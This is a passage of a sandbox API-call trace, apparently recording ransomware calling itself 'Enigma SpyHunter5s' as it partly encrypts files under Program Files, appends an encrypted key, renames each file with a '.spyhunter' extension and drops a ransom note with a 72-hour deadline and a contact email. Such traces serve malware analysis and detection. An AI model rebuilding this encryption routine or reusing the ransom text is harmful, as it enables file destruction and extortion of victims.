hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0164.478] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0164.478] WriteFile (in: hFile=0x9c, lpBuffer=0x25ce644*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce604, lpOverlapped=0x0 | out: lpBuffer=0x25ce644*, lpNumberOfBytesWritten=0x25ce604*=0x4, lpOverlapped=0x0) returned 1 [0164.478] WriteFile (in: hFile=0x9c, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce604, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25ce604*=0x30, lpOverlapped=0x0) returned 1 [0164.478] CloseHandle (hObject=0x9c) returned 1 [0164.478] GetProcessHeap () returned 0x2c0000 [0164.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0164.478] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\AssemblyList_4_extended.xml.spyhunter") returned 89 [0164.478] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\AssemblyList_4_extended.xml" (normalized: "c:\\program files (x86)\\microsoft.net\\redistlist\\assemblylist_4_extended.xml"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\AssemblyList_4_extended.xml.spyhunter" (normalized: "c:\\program files (x86)\\microsoft.net\\redistlist\\assemblylist_4_extended.xml.spyhunter")) returned 1 [0164.479] GetProcessHeap () returned 0x2c0000 [0164.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0164.479] GetProcessHeap () returned 0x2c0000 [0164.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0164.481] GetProcessHeap () returned 0x2c0000 [0164.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eeb038 | out: hHeap=0x2c0000) returned 1 [0164.481] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce640 | out: pbBuffer=0x25ce640) returned 1 [0164.481] GetProcessHeap () returned 0x2c0000 [0164.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0164.481] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25ce638*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25ce638*=0x30) returned 1 [0164.494] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\adodb.dll" (normalized: "c:\\program files (x86)\\microsoft.net\\primary interop assemblies\\adodb.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0164.498] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\adodb.dll") returned 77 [0164.498] StrStrW (lpFirst="adodb.dll", lpSrch=".txt") returned 0x0 [0164.498] GetProcessHeap () returned 0x2c0000 [0164.498] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0164.499] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce5fc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ce5fc*=0x2800, lpOverlapped=0x0) returned 1 [0164.593] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0164.593] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce5fc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ce5fc*=0x2800, lpOverlapped=0x0) returned 1 [0164.594] GetProcessHeap () returned 0x2c0000 [0164.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0164.594] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0164.594] WriteFile (in: hFile=0xa0, lpBuffer=0x25ce63c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce5fc, lpOverlapped=0x0 | out: lpBuffer=0x25ce63c*, lpNumberOfBytesWritten=0x25ce5fc*=0x4, lpOverlapped=0x0) returned 1 [0164.594] WriteFile (in: hFile=0xa0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce5fc, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25ce5fc*=0x30, lpOverlapped=0x0) returned 1 [0164.594] CloseHandle (hObject=0xa0) returned 1 [0164.594] GetProcessHeap () returned 0x2c0000 [0164.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0164.594] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\adodb.dll.spyhunter") returned 87 [0164.594] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\adodb.dll" (normalized: "c:\\program files (x86)\\microsoft.net\\primary interop assemblies\\adodb.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\adodb.dll.spyhunter" (normalized: "c:\\program files (x86)\\microsoft.net\\primary interop assemblies\\adodb.dll.spyhunter")) returned 1 [0164.595] GetProcessHeap () returned 0x2c0000 [0164.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0164.595] GetProcessHeap () returned 0x2c0000 [0164.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0164.595] GetProcessHeap () returned 0x2c0000 [0164.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eead80 | out: hHeap=0x2c0000) returned 1 [0164.596] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce640 | out: pbBuffer=0x25ce640) returned 1 [0164.596] GetProcessHeap () returned 0x2c0000 [0164.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0164.596] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25ce638*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25ce638*=0x30) returned 1 [0164.596] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\1033\\VSTAClientPkgUI.dll" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\vsta\\bin\\1033\\vstaclientpkgui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0164.596] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\1033\\VSTAClientPkgUI.dll") returned 86 [0164.596] StrStrW (lpFirst="VSTAClientPkgUI.dll", lpSrch=".txt") returned 0x0 [0164.597] GetProcessHeap () returned 0x2c0000 [0164.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0164.597] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce5fc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ce5fc*=0x2800, lpOverlapped=0x0) returned 1 [0164.702] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0164.702] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce5fc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ce5fc*=0x2800, lpOverlapped=0x0) returned 1 [0164.702] GetProcessHeap () returned 0x2c0000 [0164.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0164.702] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0164.703] WriteFile (in: hFile=0xa0, lpBuffer=0x25ce63c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce5fc, lpOverlapped=0x0 | out: lpBuffer=0x25ce63c*, lpNumberOfBytesWritten=0x25ce5fc*=0x4, lpOverlapped=0x0) returned 1 [0164.703] WriteFile (in: hFile=0xa0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce5fc, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25ce5fc*=0x30, lpOverlapped=0x0) returned 1 [0164.703] CloseHandle (hObject=0xa0) returned 1 [0164.703] GetProcessHeap () returned 0x2c0000 [0164.703] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0164.703] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\1033\\VSTAClientPkgUI.dll.spyhunter") returned 96 [0164.703] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\1033\\VSTAClientPkgUI.dll" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\vsta\\bin\\1033\\vstaclientpkgui.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\1033\\VSTAClientPkgUI.dll.spyhunter" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\vsta\\bin\\1033\\vstaclientpkgui.dll.spyhunter")) returned 1 [0164.704] GetProcessHeap () returned 0x2c0000 [0164.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0164.704] GetProcessHeap () returned 0x2c0000 [0164.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0164.704] GetProcessHeap () returned 0x2c0000 [0164.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecae58 | out: hHeap=0x2c0000) returned 1 [0164.704] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0164.842] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0164.842] WriteFile (in: hFile=0xa0, lpBuffer=0x25ce56f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ce698, lpOverlapped=0x0 | out: lpBuffer=0x25ce56f*, lpNumberOfBytesWritten=0x25ce698*=0x127, lpOverlapped=0x0) returned 1 [0164.861] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0164.861] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ce698, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ce698*=0x2ac, lpOverlapped=0x0) returned 1 [0164.861] CloseHandle (hObject=0xa0) returned 1 [0164.864] GetProcessHeap () returned 0x2c0000 [0164.864] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e887b0 | out: hHeap=0x2c0000) returned 1 [0164.864] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce638 | out: pbBuffer=0x25ce638) returned 1 [0164.864] GetProcessHeap () returned 0x2c0000 [0164.864] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0164.864] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce630*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce630*=0x30) returned 1 [0164.864] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\SplashScreen.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\splashscreen.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0164.925] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\SplashScreen.zip") returned 117 [0164.925] StrStrW (lpFirst="SplashScreen.zip", lpSrch=".txt") returned 0x0 [0164.926] GetProcessHeap () returned 0x2c0000 [0164.926] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0164.926] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce5f4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ce5f4*=0x2800, lpOverlapped=0x0) returned 1 [0164.928] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0164.928] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce5f4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ce5f4*=0x2800, lpOverlapped=0x0) returned 1 [0164.928] GetProcessHeap () returned 0x2c0000 [0164.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0164.928] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0164.928] WriteFile (in: hFile=0x9c, lpBuffer=0x25ce634*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce5f4, lpOverlapped=0x0 | out: lpBuffer=0x25ce634*, lpNumberOfBytesWritten=0x25ce5f4*=0x4, lpOverlapped=0x0) returned 1 [0164.928] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce5f4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce5f4*=0x30, lpOverlapped=0x0) returned 1 [0164.929] CloseHandle (hObject=0x9c) returned 1 [0164.929] GetProcessHeap () returned 0x2c0000 [0164.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0164.929] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\SplashScreen.zip.spyhunter") returned 127 [0164.929] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\SplashScreen.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\splashscreen.zip"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\SplashScreen.zip.spyhunter" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\splashscreen.zip.spyhunter")) returned 1 [0164.930] GetProcessHeap () returned 0x2c0000 [0164.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0164.930] GetProcessHeap () returned 0x2c0000 [0164.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0164.930] GetProcessHeap () returned 0x2c0000 [0164.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e88408 | out: hHeap=0x2c0000) returned 1 [0164.930] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce630 | out: pbBuffer=0x25ce630) returned 1 [0164.930] GetProcessHeap () returned 0x2c0000 [0164.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0164.930] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce628*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce628*=0x30) returned 1 [0164.931] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\SettingsInternal.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\settingsinternal.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0164.932] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\SettingsInternal.zip") returned 121 [0164.932] StrStrW (lpFirst="SettingsInternal.zip", lpSrch=".txt") returned 0x0 [0164.932] GetProcessHeap () returned 0x2c0000 [0164.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0164.932] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce5ec, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ce5ec*=0x419, lpOverlapped=0x0) returned 1 [0165.061] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffbe7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0165.061] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x419, lpNumberOfBytesWritten=0x25ce5ec, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ce5ec*=0x419, lpOverlapped=0x0) returned 1 [0165.061] GetProcessHeap () returned 0x2c0000 [0165.061] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0165.061] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.061] WriteFile (in: hFile=0x9c, lpBuffer=0x25ce62c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce5ec, lpOverlapped=0x0 | out: lpBuffer=0x25ce62c*, lpNumberOfBytesWritten=0x25ce5ec*=0x4, lpOverlapped=0x0) returned 1 [0165.061] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce5ec, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce5ec*=0x30, lpOverlapped=0x0) returned 1 [0165.061] CloseHandle (hObject=0x9c) returned 1 [0165.061] GetProcessHeap () returned 0x2c0000 [0165.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0165.061] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\SettingsInternal.zip.spyhunter") returned 131 [0165.062] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\SettingsInternal.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\settingsinternal.zip"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\SettingsInternal.zip.spyhunter" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\settingsinternal.zip.spyhunter")) returned 1 [0165.063] GetProcessHeap () returned 0x2c0000 [0165.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0165.063] GetProcessHeap () returned 0x2c0000 [0165.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0165.063] GetProcessHeap () returned 0x2c0000 [0165.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e3b440 | out: hHeap=0x2c0000) returned 1 [0165.063] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce630 | out: pbBuffer=0x25ce630) returned 1 [0165.063] GetProcessHeap () returned 0x2c0000 [0165.063] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0165.063] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce628*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce628*=0x30) returned 1 [0165.063] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Explorer.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\explorer.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0165.064] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Explorer.zip") returned 113 [0165.064] StrStrW (lpFirst="Explorer.zip", lpSrch=".txt") returned 0x0 [0165.064] GetProcessHeap () returned 0x2c0000 [0165.064] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0165.064] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce5ec, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ce5ec*=0x2800, lpOverlapped=0x0) returned 1 [0165.142] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0165.142] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce5ec, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ce5ec*=0x2800, lpOverlapped=0x0) returned 1 [0165.142] GetProcessHeap () returned 0x2c0000 [0165.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0165.142] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.142] WriteFile (in: hFile=0x9c, lpBuffer=0x25ce62c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce5ec, lpOverlapped=0x0 | out: lpBuffer=0x25ce62c*, lpNumberOfBytesWritten=0x25ce5ec*=0x4, lpOverlapped=0x0) returned 1 [0165.142] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce5ec, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce5ec*=0x30, lpOverlapped=0x0) returned 1 [0165.142] CloseHandle (hObject=0x9c) returned 1 [0165.143] GetProcessHeap () returned 0x2c0000 [0165.143] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0165.143] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Explorer.zip.spyhunter") returned 123 [0165.143] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Explorer.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\explorer.zip"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Explorer.zip.spyhunter" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\explorer.zip.spyhunter")) returned 1 [0165.144] GetProcessHeap () returned 0x2c0000 [0165.144] 